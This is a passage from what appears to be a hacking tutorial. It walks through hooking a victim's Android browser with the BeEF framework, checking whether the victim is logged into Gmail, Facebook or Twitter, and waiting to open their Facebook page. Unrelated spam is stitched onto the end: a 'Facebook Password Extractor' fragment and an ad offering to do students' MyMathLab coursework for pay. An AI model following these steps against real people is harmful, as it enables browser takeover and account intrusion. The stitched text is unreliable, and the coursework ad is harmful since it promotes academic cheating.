Now we are replicating the behavior of the victim. When they navigate to the website hosting the hook, it will automatically inject the JavaScript into their browser and hook it. So, we need to use the stock browser on an Android device and go to 192.168.1.107:8080, or whatever the IP is of your website.
Step 9: Hook Browser
When the user/device visits our web server at 192.168.1.107, the BeEF JavaScript will hook their browser. It will show under the "Hooked Browser" explorer in BeEF. We now control their browser!
Step 10: Detect if the Browser Is
Authenticated to Facebook
Now let's go back to BeEF and go to the "Commands" tab. Under the "Network" folder we find the "Detect Social Networks" command. This command will check to see whether the victim is authenticated to Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower right.
When we do so, BeEF will return for us the results. As you can see below, BeEF returned to us that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.
Now, we need to simply wait until the user is authenticated to Facebook and attempt this command again. Once they have authenticated to Facebook, we can direct a tab to open the user's Facebook page!

Facebook Password Extractor.

Statistics Help Online

Are you a college student taking a statistics course and interested in paying someone to do mymathlab  for you ? We provide stats help in ar...